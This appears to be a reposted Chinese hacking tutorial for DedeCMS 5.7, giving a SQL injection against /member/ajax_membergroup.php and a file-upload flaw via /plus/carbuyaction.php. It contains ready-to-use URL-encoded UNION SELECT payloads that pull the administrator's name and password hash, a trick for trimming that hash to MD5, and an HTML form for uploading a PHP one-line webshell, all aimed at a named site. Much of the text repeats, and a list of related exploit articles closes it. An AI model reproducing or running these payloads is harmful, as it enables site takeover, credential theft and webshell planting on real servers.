织梦5.7注入加上传漏洞
2012-05-09 13:50
330 查看
会员中心查询会员信息语句过滤不严,导致url可提交注入参数;
会员中心有上传动作过滤不严,导致上传漏洞
详细说明:
①注入漏洞。
这站 http://www.webshell.cc/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
然后访问
然后写上语句
查看管理员帐号
admin www.2cto.com
查看管理员密码
8d29b1ef9f8c5a5af429
查看管理员密码
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
8d2
9b1ef9f8c5a5af42
9
cmd5没解出来 只好测试第二个方法
②上传漏洞:
只要登陆会员中心,然后访问页面链接
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
会员中心有上传动作过滤不严,导致上传漏洞
详细说明:
①注入漏洞。
这站 http://www.webshell.cc/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
然后访问
“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
然后写上语句
查看管理员帐号
http://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
admin www.2cto.com
查看管理员密码
http://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
8d29b1ef9f8c5a5af429
查看管理员密码
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
8d2
9b1ef9f8c5a5af42
9
cmd5没解出来 只好测试第二个方法
②上传漏洞:
只要登陆会员中心,然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
<form action="=../dialog/select_soft_post] <[/url">http://www.webshell.cc/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
相关文章推荐
- 织梦5.7注入加上传漏洞
- 织梦5.7注入加上传漏洞
- (织梦cms)dedecms5.7注入和上传0day
- dedecms5.7最新注入和上传漏洞
- dedecms5.7注入和上传漏洞
- “织梦”CMS注入高危漏洞情况
- PHP漏洞全解(PHP安全性/命令注入/脚本植入/xss跨站/SQL注入/伪跨站请求/Session劫持/HTTP响应拆分/文件上传漏洞)
- 织梦(DEDE)5.7上传文件出现“你没有选择上传的文件或选择的文件大小超出限制”错误
- 织梦DEDECMS search.php注入漏洞EXP[通杀]
- DedeCms 5.7友情链接模块注入漏洞
- cmseasy(易通CMS) 注入漏洞 上传漏洞 爆路径ODAY(含修复)
- 织梦cms v6.7最新上传漏洞
- 织梦dedecms漏洞修复大全注入漏洞
- web安全、XSS、CSRF、注入攻击、文件上传漏洞
- 织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
- 织梦5.7为什么不能上传图片
- 织梦最新注入漏洞直接获取管理员帐号
- 织梦不能上传jpg格式的图片怎么办如何解决
- Python写的Discuz7.2版faq.php注入漏洞工具
- PHP/ASP上传漏洞探究